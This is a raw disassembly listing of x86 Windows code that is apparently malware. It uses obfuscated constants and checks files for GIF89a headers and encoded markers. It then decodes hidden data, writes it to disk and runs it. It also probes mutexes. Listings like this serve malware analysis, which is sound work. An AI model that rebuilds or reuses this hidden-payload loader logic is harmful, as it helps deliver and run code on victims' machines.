movsx edx, word ptr ds:10012194h
add edx, ds:100120F8h
sub edx, 2
mov [ebp+ebx+var_316], dl
mov edi, ds:10012158h
loc_422EB2: ; CODE XREF: sub_422E53+158�j
mov eax, edi
movsx ecx, word ptr ds:1001216Ch
add ecx, ds:10012094h
sub ecx, 8
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
mov ecx, ds:100120ACh
dec ecx
mul ecx
mov [ebp+var_324], eax
mov eax, ds:10012178h
sub eax, 2
mov edx, [ebp+var_324]
add edx, eax
mov eax, ds:100120FCh
sub eax, 7
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, ds:10012104h
sub edx, 3
cmp eax, edx
jnz loc_422FAA
mov eax, edi
movsx ecx, word ptr ds:100120E0h
add ecx, ds:100120E4h
mul ecx
mov [ebp+var_328], eax
movsx eax, word ptr ds:1001219Ch
add eax, ds:100121ACh
sub eax, 8
mov edx, [ebp+var_328]
add edx, eax
mov eax, ds:100120D4h
dec eax
mov [ebp+edx+var_212], al
mov eax, edi
mov ecx, ds:1001211Ch
add ecx, ds:1001210Ch
sub ecx, 8
mul ecx
mov [ebp+var_32C], eax
movsx eax, word ptr ds:100120D8h
sub eax, 2
mov edx, [ebp+var_32C]
add edx, eax
movsx eax, word ptr ds:10012090h
add eax, ds:100120A4h
sub eax, 3
mov [ebp+edx+var_212], al
jmp short loc_422FB0
; ---------------------------------------------------------------------------
loc_422FAA: ; CODE XREF: sub_422E53+D1�j
inc edi
jmp loc_422EB2
; ---------------------------------------------------------------------------
loc_422FB0: ; CODE XREF: sub_422E53+155�j
cmp dword ptr ds:100121ECh, 0
jz short loc_422FF1
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000E600h
mov esi, eax
or esi, esi
jz short loc_422FF1
cmp dword ptr ds:100121F0h, 0
jz short loc_423012
mov eax, ds:100121ACh
sub eax, 3
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000C01Ch
loc_422FF1: ; CODE XREF: sub_422E53+164�j
; sub_422E53+179�j
push dword ptr ds:1000E610h
push dword ptr ds:10011610h
lea eax, [ebp+var_316]
push eax
call sub_41C797
add esp, 0Ch
mov [ebp+var_31C], eax
loc_423012: ; CODE XREF: sub_422E53+182�j
pop edi
pop esi
pop ebx
leave
retn
sub_422E53 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 158h
push ebx
push esi
push edi
call sub_41EE5E
call sub_41AE1F
call sub_422793
call sub_41B2E4
call sub_422A04
call sub_422C2F
call sub_41B167
call sub_420568
loc_42304B: ; CODE XREF: .data:004230A0�j
call sub_423BBE
mov ebx, eax
mov [ebp-45h], bl
movzx eax, byte ptr [ebp-45h]
mov edx, ds:100121ACh
sub edx, 2
cmp eax, edx
jnz short loc_42307B
mov eax, ds:10012138h
add eax, ds:1001218Ch
sub eax, 8
push eax
call dword ptr ds:10011660h
loc_42307B: ; CODE XREF: .data:00423064�j
movzx eax, byte ptr [ebp-45h]
mov edx, ds:10012108h
inc edx
cmp eax, edx
jnz short loc_4230A2
mov eax, ds:100121B4h
add eax, 5Ch
add eax, ds:100120FCh
push eax
call dword ptr ds:10011630h
pop ecx
jmp short loc_42304B
; ---------------------------------------------------------------------------
loc_4230A2: ; CODE XREF: .data:00423088�j
push 100127D4h
call sub_4228CE
mov [ebp-154h], eax
push 100127CAh
call sub_4228CE
mov esi, ds:100121C8h
movsx ebx, word ptr ds:100121BCh
add esi, ebx
sub esi, 7
push esi
push eax
mov esi, [ebp-154h]
push esi
lea esi, [ebp-144h]
push esi
call dword ptr ds:10011634h
lea eax, [ebp-144h]
push eax
push 0
push 0
call dword ptr ds:1001161Ch
push 0
call dword ptr ds:1000E5E8h
mov edi, eax
push 100127C0h
call sub_4228CE
mov [ebp-20h], eax
mov [ebp-34h], edi
lea eax, ds:10007306h
mov [ebp-40h], eax
push 7F00h
push 0
call dword ptr ds:1000F220h
mov [ebp-2Ch], eax
push 7F03h
push 0
call dword ptr ds:10011620h
mov [ebp-30h], eax
and dword ptr [ebp-24h], 0
push 0
call dword ptr ds:1000D120h
mov [ebp-28h], eax
mov dword ptr [ebp-44h], 3
mov eax, ds:1001217Ch
add eax, ds:1001209Ch
sub eax, 0Eh
mov [ebp-3Ch], eax
mov eax, ds:10012164h
mov [ebp-38h], eax
lea eax, [ebp-44h]
push eax
call dword ptr ds:1000E0DCh
push 100127B6h
call sub_4228CE
mov [ebp-158h], eax
push 100127ACh
call sub_4228CE
push 0
push edi
push 0
push 0
mov esi, ds:1001217Ch
sub esi, 6
push esi
mov esi, ds:100120C0h
movsx ebx, word ptr ds:100120E0h
add esi, ebx
dec esi
push esi
movsx esi, word ptr ds:10012100h
sub esi, 9
push esi
movsx esi, word ptr ds:10012168h
movsx ebx, word ptr ds:100120DCh
add esi, ebx
sub esi, 0Eh
push esi
push 0CA0000h
push eax
mov esi, [ebp-158h]
push esi
mov esi, ds:1001209Ch
add esi, ds:100120A4h
sub esi, 0Ah
push esi
call dword ptr ds:10010648h
mov ds:1000E60Ch, eax
lea eax, [ebp-148h]
push eax
push edi
call sub_41B740
add esp, 2Ch
mov [ebp-14Ch], eax
mov ds:10011610h, eax
mov eax, [ebp-148h]
mov ds:1000E610h, eax
call sub_41A748
lea eax, [ebp-150h]
push eax
movsx eax, word ptr ds:10012100h
add eax, ds:10012160h
sub eax, 11h
push eax
push 0
push 100058A2h
mov eax, ds:100121C4h
sub eax, 5
push eax
push 0
call dword ptr ds:10011B90h
push eax
call dword ptr ds:10010650h
call sub_41B939
call sub_4202BE
jmp short loc_423276
; ---------------------------------------------------------------------------
loc_423262: ; CODE XREF: .data:0042329A�j
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1001177Ch
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1000C050h
loc_423276: ; CODE XREF: .data:00423260�j
movsx eax, word ptr ds:10012114h
sub eax, 2
push eax
movsx eax, word ptr ds:10012170h
sub eax, 8
push eax
push 0
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1000F368h
or eax, eax
jnz short loc_423262
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4232A3 proc near ; CODE XREF: sub_41DEB9+219�p
; sub_41DEB9+22B�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D46 = byte ptr -30D46h
var_30D43 = byte ptr -30D43h
var_30D41 = byte ptr -30D41h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
var_30D3B = byte ptr -30D3Bh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_424F4D
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, ds:10012138h
add eax, ds:10012174h
sub eax, 11h
push eax
push 3
push 0
mov eax, ds:1001218Ch
dec eax
push eax
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10011788h
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_423762
push 0
lea eax, [ebp+var_30E4C]
push eax
movsx eax, word ptr ds:10012114h
mov edx, ds:10012120h
lea eax, [eax+edx+80h]
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000C028h
mov [ebp+var_30E44], eax
mov eax, ds:1001217Ch
add eax, ds:1001212Ch
sub eax, 0Bh
cmp [ebp+var_30E44], eax
jz loc_423744
cmp [ebp+var_30E3F], 47h
jnz short loc_42337D
cmp [ebp+var_30E3E], 49h
jnz short loc_42337D
cmp [ebp+var_30E3D], 46h
jnz short loc_42337D
cmp [ebp+var_30E3C], 38h
jnz short loc_42337D
cmp [ebp+var_30E3B], 39h
jnz short loc_42337D
cmp [ebp+var_30E3A], 61h
jz short loc_423382
loc_42337D: ; CODE XREF: sub_4232A3+AB�j
; sub_4232A3+B4�j ...
jmp loc_423744
; ---------------------------------------------------------------------------
loc_423382: ; CODE XREF: sub_4232A3+D8�j
movzx eax, [ebp+var_30E15]
mov edx, ds:100121C0h
add edx, 35h
add edx, ds:100121B8h
cmp eax, edx
jnz short loc_4233AE
cmp [ebp+var_30DBE], 3Dh
jnz short loc_4233AE
cmp [ebp+var_30DBD], 3Dh
jz short loc_4233B3
loc_4233AE: ; CODE XREF: sub_4232A3+F7�j
; sub_4232A3+100�j
jmp loc_423744
; ---------------------------------------------------------------------------
loc_4233B3: ; CODE XREF: sub_4232A3+109�j
or ebx, ebx
jnz short loc_4233E2
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_424013
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_423744
loc_4233E2: ; CODE XREF: sub_4232A3+112�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000C028h
mov [ebp+var_30E44], eax
movsx eax, word ptr ds:10012100h
add eax, ds:100120A0h
sub eax, 0Dh
cmp [ebp+var_30E44], eax
jz loc_423744
mov eax, [ebp+var_30E4C]
mov edx, ds:1001210Ch
movsx ecx, word ptr ds:100120D8h
add edx, ecx
sub edx, 0Ch
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_423767
add esp, 0Ch
mov esi, eax
mov edi, ds:100120D4h
dec edi
jmp short loc_4234AF
; ---------------------------------------------------------------------------
loc_42346A: ; CODE XREF: sub_4232A3+20E�j
or ebx, ebx
jz short loc_423481
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_4234AE
; ---------------------------------------------------------------------------
loc_423481: ; CODE XREF: sub_4232A3+1C9�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_4234AE: ; CODE XREF: sub_4232A3+1DC�j
inc edi
loc_4234AF: ; CODE XREF: sub_4232A3+1C5�j
cmp edi, esi
jb short loc_42346A
or ebx, ebx
jz short loc_4234E3
mov eax, ds:100120E4h
add eax, ds:100120FCh
sub eax, 8
mov edx, esi
sub edx, eax
movsx eax, word ptr ds:100120F4h
movsx ecx, word ptr ds:10012148h
add eax, ecx
sub eax, 0Ch
mov [ebp+edx+var_30D40], al
loc_4234E3: ; CODE XREF: sub_4232A3+212�j
movsx eax, word ptr ds:10012100h
mov edx, ds:10012134h
lea eax, [eax+edx+77h]
movsx edx, word ptr ds:10012154h
sub edx, 8
mov [ebp+eax+var_30E3F], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_423767
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_41C68E
add esp, 18h
mov [ebp+var_30E44], eax
movsx eax, word ptr ds:100120D8h
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_423744
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_423695
mov eax, ds:10012124h
cmp [ebp+eax+var_30D41], 64h
jnz loc_423609
movzx eax, [ebp+var_30D3F]
mov edx, ds:100121C4h
add edx, 1Bh
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_4223D9
mov eax, ds:10012130h
movsx edx, word ptr ds:100120F4h
add eax, edx
sub eax, 9
mov ds:1000E61Ch, eax
mov eax, ds:10012178h
movsx edx, word ptr ds:10012090h
add eax, edx
sub eax, 4
mov ds:10012290h, eax
mov eax, ds:10012164h
add eax, ds:10012160h
movsx edx, word ptr ds:10012090h
movsx ecx, word ptr ds:100120E0h
add edx, ecx
dec edx
mov [ebp+eax+var_30D46], dl
mov eax, ds:100121A0h
add eax, ds:100120F0h
sub eax, 9
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_41B58F
add esp, 10h
loc_423609: ; CODE XREF: sub_4232A3+2CC�j
mov eax, ds:10012104h
add eax, ds:10012108h
cmp [ebp+eax+var_30D43], 67h
jnz loc_423744
mov eax, ds:1001212Ch
movsx edx, word ptr ds:10012154h
sub edx, 8
mov [ebp+eax+var_30D3B], dl
lea eax, [ebp+var_30D3F]
push eax
call dword ptr ds:1000C054h
mov [ebp+var_61D9C], eax
push eax
push 10011670h
call sub_41E5D9
mov eax, ds:10012138h
sub eax, 8
mov ds:1000E61Ch, eax
mov eax, ds:10012098h
sub eax, 7
mov ds:10012290h, eax
movsx eax, word ptr ds:1001219Ch
add eax, ds:1001211Ch
sub eax, 8
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_41B58F
add esp, 14h
jmp loc_423744
; ---------------------------------------------------------------------------
loc_423695: ; CODE XREF: sub_4232A3+2B9�j
mov eax, ds:100121B0h
add eax, 4
add eax, ds:10012178h
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_422857
push 100127A4h
call sub_4228CE
push eax
lea edx, [ebp+var_30F4B]
push edx
call dword ptr ds:1000C020h
push 0
push 80h
push 2
push 0
movsx eax, word ptr ds:100120E8h
add eax, ds:1001212Ch
sub eax, 0Ah
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:10011788h
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call dword ptr ds:10011B8Ch
push [ebp+var_61C98]
call dword ptr ds:10010650h
push 5
lea eax, [ebp+var_30F4B]
push eax
call dword ptr ds:1000E0E0h
movzx eax, [ebp+var_30F51]
push eax
call sub_41E21C
add esp, 18h
loc_423744: ; CODE XREF: sub_4232A3+9E�j
; sub_4232A3:loc_42337D�j ...
push [ebp+var_30E48]
call dword ptr ds:10010650h
cmp [ebp+var_30F50], 0
jz short loc_423762
push [ebp+arg_0]
call dword ptr ds:1000C008h
loc_423762: ; CODE XREF: sub_4232A3+4D�j
; sub_4232A3+4B4�j
pop edi
pop esi
pop ebx
leave
retn
sub_4232A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423767 proc near ; CODE XREF: .data:00422D7E�p
; sub_4232A3+1B4�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word ptr ds:10012150h
sub eax, 5
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_423890
; ---------------------------------------------------------------------------
loc_423795: ; CODE XREF: sub_423767+131�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, ds:1001234Ch[edx]
mov eax, ds:100120A4h
add eax, ds:100120C0h
sub eax, 2
neg eax
cmp esi, eax
jz loc_42388F
mov eax, [ebp+var_8]
or eax, eax
jl loc_42388C
cmp eax, 3
jg loc_42388C
jmp dword ptr ds:1001274Ch[eax*4]
; ---------------------------------------------------------------------------
db 0FFh, 45h, 0F8h
dd 0AFE9h, 0F4558B00h, 20CC0D8Bh, 0D031001h, 10012190h
dd 8902E983h, 89E0D3D0h, 0F289E845h, 8B30E283h, 120A00Dh
dd 300D0310h, 89100121h, 8BF8D3D0h, 0C209E855h, 89F35588h
dd 558A43D8h, 0FF1088F3h, 6CEBF845h, 83F4558Bh, 0BF0F0FE2h
dd 120F40Dh, 5E98310h, 0E0D3D089h, 89E44589h, 3CE283F2h
dd 20B80D8Bh, 0E9831001h, 0D3D08902h, 0E4558BF8h, 5588C209h
dd 43D889F3h, 88F3558Ah, 0F845FF10h, 558B2EEBh, 3E283F4h
dd 680DBF0Fh, 83100121h, 0D08902E9h, 0C289E0D3h, 5588F209h
dd 43D889F3h, 88F3558Ah, 20B8A110h, 0E8831001h, 0F8458904h
; ---------------------------------------------------------------------------
loc_42388C: ; CODE XREF: sub_423767+58�j
; sub_423767+61�j
mov [ebp+var_C], esi
loc_42388F: ; CODE XREF: sub_423767+4D�j
inc edi
loc_423890: ; CODE XREF: sub_423767+29�j
cmp byte ptr [edi], 0
jz short loc_42389E
cmp ebx, [ebp+var_4]
jb loc_423795
loc_42389E: ; CODE XREF: sub_423767+12C�j
cmp byte ptr [edi], 0
jnz short loc_4238AA
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_4238BA
; ---------------------------------------------------------------------------
loc_4238AA: ; CODE XREF: sub_423767+13A�j
mov eax, ds:100121ACh
add eax, ds:100120E4h
sub eax, 5
neg eax
loc_4238BA: ; CODE XREF: sub_423767+141�j
pop edi
pop esi
pop ebx
leave
retn
sub_423767 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4238BF proc near ; CODE XREF: sub_4202BE+184�p
; sub_4202BE+202�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, ds:10012164h
lea eax, [ebp+var_4]
push eax
push 100138DCh
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, ds:10012138h
add eax, ds:100120F8h
sub eax, 0Ah
cmp edi, eax
jz short loc_4238FB
xor eax, eax
jmp short loc_423965
; ---------------------------------------------------------------------------
loc_4238FB: ; CODE XREF: sub_4238BF+36�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
movsx eax, word ptr ds:10012100h
sub eax, 9
cmp edi, eax
jnz short loc_42395A
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, ds:10012138h
add eax, ds:100120ECh
sub eax, 0Dh
cmp edi, eax
jnz short loc_423951
mov eax, ds:10012164h
movsx edx, word ptr ds:10012100h
mov esi, eax
add esi, edx
sub esi, 8
loc_423951: ; CODE XREF: sub_4238BF+7D�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_42395A: ; CODE XREF: sub_4238BF+5A�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_423965: ; CODE XREF: sub_4238BF+3A�j
pop edi
pop esi
pop ebx
leave
retn
sub_4238BF endp
; ---------------------------------------------------------------------------
dw 1B8h
dd 0C2800040h
db 8, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423972 proc near ; CODE XREF: sub_41C68E+C5�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
movsx eax, word ptr ds:1001216Ch
add eax, ds:100120F0h
sub eax, 8
push eax
push [ebp+arg_0]
call dword ptr ds:10010630h
pop ebp
retn
sub_423972 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423996 proc near ; CODE XREF: sub_4242A2+239�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_41BB8D
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_423BB9
mov [ebp+var_18], 8
push 10012794h
call sub_41F3E4
pop ecx
push eax
call dword ptr ds:1000C044h
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word ptr ds:100120D8h
movsx edx, word ptr ds:100120E8h
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz loc_423B9D
lea eax, [ebp+var_3C]
push eax
push 1001391Ch
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012194h
add eax, ds:10012174h
sub eax, 9
cmp ebx, eax
jnz loc_423B94
mov [ebp+var_30], 2
mov eax, ds:100120CCh
dec eax
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word ptr ds:100120F4h
sub eax, 9
cmp ebx, eax
jnz loc_423B8B
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 1001390Ch
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
cmp ebx, ds:10012164h
jnz loc_423B82
inc dword ptr ds:1000E61Ch
mov eax, ds:10012160h
add eax, 2
cmp ds:1000E61Ch, eax
jb short loc_423AE8
mov eax, ds:100121B8h
add eax, 2
add eax, ds:100120ECh
mov ds:1000E61Ch, eax
push [ebp+var_4]
call sub_41C561
pop ecx
jmp loc_423B79
; ---------------------------------------------------------------------------
loc_423AE8: ; CODE XREF: sub_423996+12F�j
mov eax, ds:1001218Ch
dec eax
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push dword ptr ds:1001063Ch
call sub_41B0D6
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push dword ptr ds:1000C018h
call sub_41B0D6
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_423B39
cmp [ebp+var_34], 0
jz short loc_423B39
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_41E9E2
add esp, 10h
loc_423B39: ; CODE XREF: sub_423996+186�j
; sub_423996+18C�j
cmp [ebp+var_40], 0
jz short loc_423B5A
cmp [ebp+var_38], 0
jz short loc_423B5A
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_41E9E2
add esp, 10h
loc_423B5A: ; CODE XREF: sub_423996+1A7�j
; sub_423996+1AD�j
push [ebp+var_34]
call dword ptr ds:1000E618h
push [ebp+var_38]
call dword ptr ds:1000E618h
push 0
push [ebp+arg_4]
call sub_41BB8D
add esp, 8
loc_423B79: ; CODE XREF: sub_423996+14D�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_423B82: ; CODE XREF: sub_423996+115�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_423B8B: ; CODE XREF: sub_423996+ED�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_423B94: ; CODE XREF: sub_423996+9F�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_423B9D: ; CODE XREF: sub_423996+6F�j
lea eax, [ebp+var_18]
push eax
call dword ptr ds:10011BA0h
mov eax, ds:100120D4h
add eax, ds:1001210Ch
sub eax, 8
cmp ebx, eax
jz short $+2
loc_423BB9: ; CODE XREF: sub_423996+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_423996 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423BBE proc near ; CODE XREF: .data:00420FC6�p
; .data:loc_42304B�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push ebx
push esi
push edi
mov eax, ds:100120ACh
mov edi, eax
add edi, ds:10012174h
sub edi, 0Bh
jmp loc_423C62
; ---------------------------------------------------------------------------
loc_423BDF: ; CODE XREF: sub_423BBE+AE�j
push 10012788h
call sub_4228CE
mov [ebp+var_108], eax
push 1001277Eh
call sub_4228CE
mov esi, ds:10012124h
movsx ebx, word ptr ds:100120E8h
add esi, ebx
sub esi, 5
push esi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10011634h
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call dword ptr ds:10010644h
mov [ebp+var_104], eax
or eax, eax
jz short loc_423C61
push eax
call dword ptr ds:10010650h
mov eax, ds:100120FCh
sub eax, 6
cmp edi, eax
jnz short loc_423C5A
xor eax, eax
inc eax
jmp short loc_423C74
; ---------------------------------------------------------------------------
loc_423C5A: ; CODE XREF: sub_423BBE+95�j
mov eax, 2
jmp short loc_423C74
; ---------------------------------------------------------------------------
loc_423C61: ; CODE XREF: sub_423BBE+82�j
inc edi
loc_423C62: ; CODE XREF: sub_423BBE+1C�j
mov eax, ds:10012164h
add eax, 64h
cmp edi, eax
jb loc_423BDF
xor eax, eax
loc_423C74: ; CODE XREF: sub_423BBE+9A�j
; sub_423BBE+A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_423BBE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 1001396Ch
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_423CA5
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_423CED
; ---------------------------------------------------------------------------
loc_423CA5: ; CODE XREF: .data:00423C93�j
push 100138ECh
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_423CC5
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_423CED
; ---------------------------------------------------------------------------
loc_423CC5: ; CODE XREF: .data:00423CB3�j
push 100138ACh
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_423CE5
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_423CED
; ---------------------------------------------------------------------------
loc_423CE5: ; CODE XREF: .data:00423CD3�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_423CED: ; CODE XREF: .data:00423CA3�j
; .data:00423CC3�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423CF4 proc near ; CODE XREF: .data:0041B911�p
; sub_41C232+50�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_423D21
movsx eax, word ptr ds:100120BCh
add eax, ds:1001218Ch
sub eax, 0Ah
mov [ebp+var_248], eax
jmp short loc_423D99
; ---------------------------------------------------------------------------
loc_423D21: ; CODE XREF: sub_423CF4+13�j
mov edx, [ebp+arg_4]
mov ecx, ds:100121B0h
cmp ds:1000E630h[edx*4], ecx
jnz short loc_423D49
push ebx
call dword ptr ds:1000E608h
mov eax, ds:100120A8h
sub eax, 2
push eax
call dword ptr ds:10011660h
loc_423D49: ; CODE XREF: sub_423CF4+3D�j
mov eax, ds:100120F8h
add eax, 62h
mov [ebp+var_248], eax
push 10012776h
call sub_4228CE
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call dword ptr ds:10011634h
add esp, 10h
lea eax, [ebp+var_252]
push eax
call dword ptr ds:10011664h
cmp eax, 3
jnz short loc_423D99
movsx eax, word ptr ds:10012148h
add eax, 129h
mov [ebp+var_248], eax
loc_423D99: ; CODE XREF: sub_423CF4+2B�j
; sub_423CF4+91�j
xor edi, edi
inc edi
push 1001276Fh
call sub_4228CE
push esi
push eax
lea edx, [ebp+var_242]
push edx
